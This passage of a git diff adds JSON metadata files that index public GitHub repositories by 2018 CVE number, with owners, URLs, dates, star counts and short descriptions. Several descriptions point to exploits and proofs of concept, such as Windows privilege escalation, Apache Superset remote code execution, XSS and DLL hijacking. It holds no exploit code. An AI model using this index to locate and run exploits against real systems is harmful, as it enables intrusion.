"watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7852.json b/2018/CVE-2018-7852.json new file mode 100644 index 0000000000..7a1eaad37f --- /dev/null +++ b/2018/CVE-2018-7852.json @@ -0,0 +1,33 @@ +[ + { + "id": 711821452, + "name": "CVE-2018-7852", + "full_name": "yanissec\/CVE-2018-7852", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7852", + "description": "CVE-2018-7852", + "fork": false, + "created_at": "2023-10-30T08:41:38Z", + "updated_at": "2023-10-30T08:41:44Z", + "pushed_at": "2023-10-30T08:41:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7854.json b/2018/CVE-2018-7854.json new file mode 100644 index 0000000000..10a8c9a645 --- /dev/null +++ b/2018/CVE-2018-7854.json @@ -0,0 +1,33 @@ +[ + { + "id": 713280211, + "name": "CVE-2018-7854", + "full_name": "yanissec\/CVE-2018-7854", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7854", + "description": "CVE-2018-7854", + "fork": false, + "created_at": "2023-11-02T07:47:38Z", + "updated_at": "2023-11-02T07:47:45Z", + "pushed_at": "2023-11-02T07:47:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7935.json b/2018/CVE-2018-7935.json new file mode 100644 index 0000000000..968a444323 --- /dev/null +++ b/2018/CVE-2018-7935.json @@ -0,0 +1,33 @@ +[ + { + "id": 149753230, + "name": "CVE-2018-7935", + "full_name": "lawrenceamer\/CVE-2018-7935", + "owner": { + "login": "lawrenceamer", + "id": 10256911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10256911?v=4", + "html_url": "https:\/\/github.com\/lawrenceamer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lawrenceamer\/CVE-2018-7935", + "description": null, + "fork": false, + "created_at": "2018-09-21T11:17:59Z", + "updated_at": "2019-11-19T20:27:40Z", + "pushed_at": "2019-09-16T05:55:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8004.json b/2018/CVE-2018-8004.json new file mode 100644 index 0000000000..0e1137b216 --- /dev/null +++ b/2018/CVE-2018-8004.json @@ -0,0 +1,33 @@ +[ + { + "id": 291291006, + "name": "CVE-2018-8004", + "full_name": "mosesrenegade\/CVE-2018-8004", + "owner": { + "login": "mosesrenegade", + "id": 944551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/944551?v=4", + "html_url": "https:\/\/github.com\/mosesrenegade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mosesrenegade\/CVE-2018-8004", + "description": "CVE Repository for HTTP DeSynchronization Attacks", + "fork": false, + "created_at": "2020-08-29T14:52:09Z", + "updated_at": "2021-07-28T14:14:25Z", + "pushed_at": "2020-08-29T14:53:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8021.json b/2018/CVE-2018-8021.json new file mode 100644 index 0000000000..8cd64f8688 --- /dev/null +++ b/2018/CVE-2018-8021.json @@ -0,0 +1,33 @@ +[ + { + "id": 160079576, + "name": "Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021", + "full_name": "r3dxpl0it\/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021", + "owner": { + "login": "r3dxpl0it", + "id": 43002597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43002597?v=4", + "html_url": "https:\/\/github.com\/r3dxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dxpl0it\/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021", + "description": "CVE-2018-8021 Proof-Of-Concept and Exploit ", + "fork": false, + "created_at": "2018-12-02T19:01:17Z", + "updated_at": "2023-09-28T10:56:15Z", + "pushed_at": "2018-12-03T21:13:00Z", + "stargazers_count": 106, + "watchers_count": 106, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 106, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8032.json b/2018/CVE-2018-8032.json new file mode 100644 index 0000000000..5a2b6f5c50 --- /dev/null +++ b/2018/CVE-2018-8032.json @@ -0,0 +1,33 @@ +[ + { + "id": 251221219, + "name": "CVE-2018-8032", + "full_name": "cairuojin\/CVE-2018-8032", + "owner": { + "login": "cairuojin", + "id": 41941574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41941574?v=4", + "html_url": "https:\/\/github.com\/cairuojin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cairuojin\/CVE-2018-8032", + "description": "从老外那里下载了该漏洞的修复工程,无奈依赖包实在是太多下不下来,选取其中axis工程打成jar包后发现已成功修复项目的漏洞,有需要的亲可以下载重新打jar包替换即可。 clone后用idea打axis这个jar包即可", + "fork": false, + "created_at": "2020-03-30T06:31:49Z", + "updated_at": "2020-03-30T08:52:33Z", + "pushed_at": "2022-12-05T23:25:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8033.json b/2018/CVE-2018-8033.json new file mode 100644 index 0000000000..e99c598755 --- /dev/null +++ b/2018/CVE-2018-8033.json @@ -0,0 +1,39 @@ +[ + { + "id": 791274669, + "name": "CVE-2018-8033", + "full_name": "Cappricio-Securities\/CVE-2018-8033", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2018-8033", + "description": "Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection)", + "fork": false, + "created_at": "2024-04-24T12:23:21Z", + "updated_at": "2024-06-21T06:39:42Z", + "pushed_at": "2024-06-21T06:43:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty-tool", + "bugbounty-tools", + "cve-2018-8033", + "cve-2018-8033-scanner", + "xxe-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8038.json b/2018/CVE-2018-8038.json new file mode 100644 index 0000000000..501d515d72 --- /dev/null +++ b/2018/CVE-2018-8038.json @@ -0,0 +1,33 @@ +[ + { + "id": 158217015, + "name": "CVE-2018-8038", + "full_name": "tafamace\/CVE-2018-8038", + "owner": { + "login": "tafamace", + "id": 45160113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tafamace\/CVE-2018-8038", + "description": null, + "fork": false, + "created_at": "2018-11-19T12:14:45Z", + "updated_at": "2018-11-19T12:37:32Z", + "pushed_at": "2018-11-19T12:37:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8039.json b/2018/CVE-2018-8039.json new file mode 100644 index 0000000000..32c3bb7e68 --- /dev/null +++ b/2018/CVE-2018-8039.json @@ -0,0 +1,33 @@ +[ + { + "id": 158216115, + "name": "CVE-2018-8039", + "full_name": "tafamace\/CVE-2018-8039", + "owner": { + "login": "tafamace", + "id": 45160113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tafamace\/CVE-2018-8039", + "description": null, + "fork": false, + "created_at": "2018-11-19T12:08:07Z", + "updated_at": "2018-11-19T12:29:15Z", + "pushed_at": "2018-11-19T12:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8045.json b/2018/CVE-2018-8045.json new file mode 100644 index 0000000000..fa5705b384 --- /dev/null +++ b/2018/CVE-2018-8045.json @@ -0,0 +1,33 @@ +[ + { + "id": 221657235, + "name": "CVE-2018-8045", + "full_name": "luckybool1020\/CVE-2018-8045", + "owner": { + "login": "luckybool1020", + "id": 16422202, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16422202?v=4", + "html_url": "https:\/\/github.com\/luckybool1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luckybool1020\/CVE-2018-8045", + "description": "Joomla内核SQL注入漏洞原理、docker及poc[基于pocsuite框架]", + "fork": false, + "created_at": "2019-11-14T09:18:40Z", + "updated_at": "2022-05-09T01:40:35Z", + "pushed_at": "2023-07-28T09:24:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8060.json b/2018/CVE-2018-8060.json new file mode 100644 index 0000000000..34ecd78141 --- /dev/null +++ b/2018/CVE-2018-8060.json @@ -0,0 +1,33 @@ +[ + { + "id": 131338446, + "name": "SIOCtl", + "full_name": "otavioarj\/SIOCtl", + "owner": { + "login": "otavioarj", + "id": 851029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/851029?v=4", + "html_url": "https:\/\/github.com\/otavioarj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/otavioarj\/SIOCtl", + "description": "Simple IOCTL dispatcher for CVE-2018-8060\/8061", + "fork": false, + "created_at": "2018-04-27T19:45:20Z", + "updated_at": "2024-06-03T07:07:39Z", + "pushed_at": "2018-05-09T22:05:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8062.json b/2018/CVE-2018-8062.json new file mode 100644 index 0000000000..dfdb8fb827 --- /dev/null +++ b/2018/CVE-2018-8062.json @@ -0,0 +1,33 @@ +[ + { + "id": 789570035, + "name": "CVE-2018-8062", + "full_name": "OscarAkaElvis\/CVE-2018-8062", + "owner": { + "login": "OscarAkaElvis", + "id": 5803348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5803348?v=4", + "html_url": "https:\/\/github.com\/OscarAkaElvis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OscarAkaElvis\/CVE-2018-8062", + "description": "Persistent XSS on Comtrend AR-5387un router", + "fork": false, + "created_at": "2024-04-20T23:26:15Z", + "updated_at": "2024-04-20T23:35:11Z", + "pushed_at": "2024-04-20T23:35:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8065.json b/2018/CVE-2018-8065.json new file mode 100644 index 0000000000..b1325f1d37 --- /dev/null +++ b/2018/CVE-2018-8065.json @@ -0,0 +1,33 @@ +[ + { + "id": 134886212, + "name": "CVE-2018-8065", + "full_name": "EgeBalci\/CVE-2018-8065", + "owner": { + "login": "EgeBalci", + "id": 17179401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17179401?v=4", + "html_url": "https:\/\/github.com\/EgeBalci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EgeBalci\/CVE-2018-8065", + "description": "Flexense HTTP Server <= 10.6.24 - Denial Of Service Exploit", + "fork": false, + "created_at": "2018-05-25T17:31:05Z", + "updated_at": "2024-08-12T19:38:48Z", + "pushed_at": "2018-09-03T18:25:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 5, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8078.json b/2018/CVE-2018-8078.json new file mode 100644 index 0000000000..1aad04db6b --- /dev/null +++ b/2018/CVE-2018-8078.json @@ -0,0 +1,33 @@ +[ + { + "id": 124507539, + "name": "YZMCMSxss", + "full_name": "Jx0n0\/YZMCMSxss", + "owner": { + "login": "Jx0n0", + "id": 21152658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21152658?v=4", + "html_url": "https:\/\/github.com\/Jx0n0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jx0n0\/YZMCMSxss", + "description": "YZMCMS v3.7最新版xss漏洞 CVE-2018-8078", + "fork": false, + "created_at": "2018-03-09T07:56:56Z", + "updated_at": "2020-01-30T09:51:26Z", + "pushed_at": "2018-03-13T02:44:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8090.json b/2018/CVE-2018-8090.json new file mode 100644 index 0000000000..5054ef0e08 --- /dev/null +++ b/2018/CVE-2018-8090.json @@ -0,0 +1,36 @@ +[ + { + "id": 141976453, + "name": "CVE-2018-8090", + "full_name": "kernelm0de\/CVE-2018-8090", + "owner": { + "login": "kernelm0de", + "id": 174887628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174887628?v=4", + "html_url": "https:\/\/github.com\/kernelm0de", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kernelm0de\/CVE-2018-8090", + "description": "DLL Hijacking in Quickheal Total Security\/ Internet Security\/ Antivirus Pro (Installers)", + "fork": false, + "created_at": "2018-07-23T07:17:07Z", + "updated_at": "2024-07-06T14:58:15Z", + "pushed_at": "2018-07-26T13:39:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "dll-hijacking" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8097.json b/2018/CVE-2018-8097.json new file mode 100644 index 0000000000..0ca74a3e74 --- /dev/null +++ b/2018/CVE-2018-8097.json @@ -0,0 +1,33 @@ +[ + { + "id": 590899118, + "name": "CVE-2018-8097", + "full_name": "SilentVoid13\/CVE-2018-8097", + "owner": { + "login": "SilentVoid13", + "id": 51264226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51264226?v=4", + "html_url": "https:\/\/github.com\/SilentVoid13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SilentVoid13\/CVE-2018-8097", + "description": "CVE-2018-8097 PoC", + "fork": false, + "created_at": "2023-01-19T13:31:12Z", + "updated_at": "2023-01-25T14:35:37Z", + "pushed_at": "2023-01-19T13:31:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8108.json b/2018/CVE-2018-8108.json new file mode 100644 index 0000000000..b8383f1d50 --- /dev/null +++ b/2018/CVE-2018-8108.json @@ -0,0 +1,33 @@ +[ + { + "id": 125155388, + "name": "BUI-select-xss", + "full_name": "zlgxzswjy\/BUI-select-xss", + "owner": { + "login": "zlgxzswjy", + "id": 12388719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12388719?v=4", + "html_url": "https:\/\/github.com\/zlgxzswjy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zlgxzswjy\/BUI-select-xss", + "description": "cve-2018-8108", + "fork": false, + "created_at": "2018-03-14T04:32:01Z", + "updated_at": "2018-03-14T04:54:50Z", + "pushed_at": "2018-03-14T04:54:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8115.json b/2018/CVE-2018-8115.json new file mode 100644 index 0000000000..017f59ad62 --- /dev/null +++ b/2018/CVE-2018-8115.json @@ -0,0 +1,33 @@ +[ + { + "id": 132660819, + "name": "scan-cve-2018-8115", + "full_name": "aquasecurity\/scan-cve-2018-8115", + "owner": { + "login": "aquasecurity", + "id": 12783832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12783832?v=4", + "html_url": "https:\/\/github.com\/aquasecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aquasecurity\/scan-cve-2018-8115", + "description": null, + "fork": false, + "created_at": "2018-05-08T20:24:23Z", + "updated_at": "2021-11-30T19:40:26Z", + "pushed_at": "2019-10-18T09:52:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8120.json b/2018/CVE-2018-8120.json new file mode 100644 index 0000000000..45a948a26a --- /dev/null +++ b/2018/CVE-2018-8120.json @@ -0,0 +1,316 @@ +[ + { + "id": 133785986, + "name": "cve-2018-8120", + "full_name": "bigric3\/cve-2018-8120", + "owner": { + "login": "bigric3", + "id": 22165361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22165361?v=4", + "html_url": "https:\/\/github.com\/bigric3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigric3\/cve-2018-8120", + "description": null, + "fork": false, + "created_at": "2018-05-17T08:51:39Z", + "updated_at": "2024-08-12T19:38:37Z", + "pushed_at": "2018-05-18T07:49:45Z", + "stargazers_count": 163, + "watchers_count": 163, + "has_discussions": false, + "forks_count": 66, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 66, + "watchers": 163, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 134023459, + "name": "CVE-2018-8120", + "full_name": "rip1s\/CVE-2018-8120", + "owner": { + "login": "rip1s", + "id": 12728984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12728984?v=4", + "html_url": "https:\/\/github.com\/rip1s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rip1s\/CVE-2018-8120", + "description": "CVE-2018-8120 Windows LPE exploit", + "fork": false, + "created_at": "2018-05-19T02:43:15Z", + "updated_at": "2024-09-14T22:01:50Z", + "pushed_at": "2018-05-30T13:09:54Z", + "stargazers_count": 494, + "watchers_count": 494, + "has_discussions": false, + "forks_count": 190, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2018-8210", + "exploit" + ], + "visibility": "public", + "forks": 190, + "watchers": 494, + "score": 0, + "subscribers_count": 22 + }, + { + "id": 136113184, + "name": "cve-2018-8120", + "full_name": "ne1llee\/cve-2018-8120", + "owner": { + "login": "ne1llee", + "id": 12810839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12810839?v=4", + "html_url": "https:\/\/github.com\/ne1llee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ne1llee\/cve-2018-8120", + "description": null, + "fork": false, + "created_at": "2018-06-05T03:12:52Z", + "updated_at": "2022-11-12T18:38:47Z", + "pushed_at": "2018-06-05T03:48:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 136446726, + "name": "CVE-2018-8120", + "full_name": "alpha1ab\/CVE-2018-8120", + "owner": { + "login": "alpha1ab", + "id": 39789275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39789275?v=4", + "html_url": "https:\/\/github.com\/alpha1ab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alpha1ab\/CVE-2018-8120", + "description": "CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7 ", + "fork": false, + "created_at": "2018-06-07T08:30:07Z", + "updated_at": "2024-08-12T19:39:09Z", + "pushed_at": "2018-08-08T05:48:24Z", + "stargazers_count": 293, + "watchers_count": 293, + "has_discussions": false, + "forks_count": 125, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 125, + "watchers": 293, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 140512208, + "name": "CVE-2018-8120", + "full_name": "EVOL4\/CVE-2018-8120", + "owner": { + "login": "EVOL4", + "id": 26862344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26862344?v=4", + "html_url": "https:\/\/github.com\/EVOL4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EVOL4\/CVE-2018-8120", + "description": "dd", + "fork": false, + "created_at": "2018-07-11T02:41:16Z", + "updated_at": "2018-11-16T12:24:05Z", + "pushed_at": "2018-08-10T13:06:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 144975276, + "name": "CVE-2018-8120", + "full_name": "ozkanbilge\/CVE-2018-8120", + "owner": { + "login": "ozkanbilge", + "id": 39211596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39211596?v=4", + "html_url": "https:\/\/github.com\/ozkanbilge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ozkanbilge\/CVE-2018-8120", + "description": "CVE-2018-8120 Windows LPE exploit", + "fork": false, + "created_at": "2018-08-16T10:51:00Z", + "updated_at": "2024-08-12T19:40:54Z", + "pushed_at": "2018-08-16T10:53:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 162424739, + "name": "CVE-2018-8120", + "full_name": "qiantu88\/CVE-2018-8120", + "owner": { + "login": "qiantu88", + "id": 35452263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35452263?v=4", + "html_url": "https:\/\/github.com\/qiantu88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiantu88\/CVE-2018-8120", + "description": null, + "fork": false, + "created_at": "2018-12-19T10:58:55Z", + "updated_at": "2018-12-19T10:59:30Z", + "pushed_at": "2018-12-19T10:59:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 197940307, + "name": "cve-2018-8120-exp", + "full_name": "Y0n0Y\/cve-2018-8120-exp", + "owner": { + "login": "Y0n0Y", + "id": 53119680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53119680?v=4", + "html_url": "https:\/\/github.com\/Y0n0Y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y0n0Y\/cve-2018-8120-exp", + "description": null, + "fork": false, + "created_at": "2019-07-20T14:21:03Z", + "updated_at": "2019-07-20T14:28:22Z", + "pushed_at": "2019-07-20T14:28:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 290703604, + "name": "CVE-2018-8120", + "full_name": "StartZYP\/CVE-2018-8120", + "owner": { + "login": "StartZYP", + "id": 37850017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37850017?v=4", + "html_url": "https:\/\/github.com\/StartZYP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StartZYP\/CVE-2018-8120", + "description": "This CVE-2018-8120 File", + "fork": false, + "created_at": "2020-08-27T07:10:34Z", + "updated_at": "2020-08-28T10:01:02Z", + "pushed_at": "2020-08-28T10:01:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 317371893, + "name": "cve-2018-8120", + "full_name": "wikiZ\/cve-2018-8120", + "owner": { + "login": "wikiZ", + "id": 37897216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37897216?v=4", + "html_url": "https:\/\/github.com\/wikiZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wikiZ\/cve-2018-8120", + "description": null, + "fork": false, + "created_at": "2020-11-30T23:28:32Z", + "updated_at": "2020-11-30T23:29:09Z", + "pushed_at": "2020-11-30T23:29:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8172.json b/2018/CVE-2018-8172.json new file mode 100644 index 0000000000..b509af97dd --- /dev/null +++ b/2018/CVE-2018-8172.json @@ -0,0 +1,33 @@ +[ + { + "id": 145187210, + "name": "CVE-2018-8172", + "full_name": "SyFi\/CVE-2018-8172", + "owner": { + "login": "SyFi", + "id": 26314806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26314806?v=4", + "html_url": "https:\/\/github.com\/SyFi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SyFi\/CVE-2018-8172", + "description": "Microsoft Visual Studio CVE-2018-8172 Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2018-08-18T03:37:15Z", + "updated_at": "2020-10-21T22:16:11Z", + "pushed_at": "2018-08-18T03:56:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8174.json b/2018/CVE-2018-8174.json new file mode 100644 index 0000000000..d791088ca1 --- /dev/null +++ b/2018/CVE-2018-8174.json @@ -0,0 +1,467 @@ +[ + { + "id": 134479769, + "name": "CVE-2018-8174-msf", + "full_name": "0x09AL\/CVE-2018-8174-msf", + "owner": { + 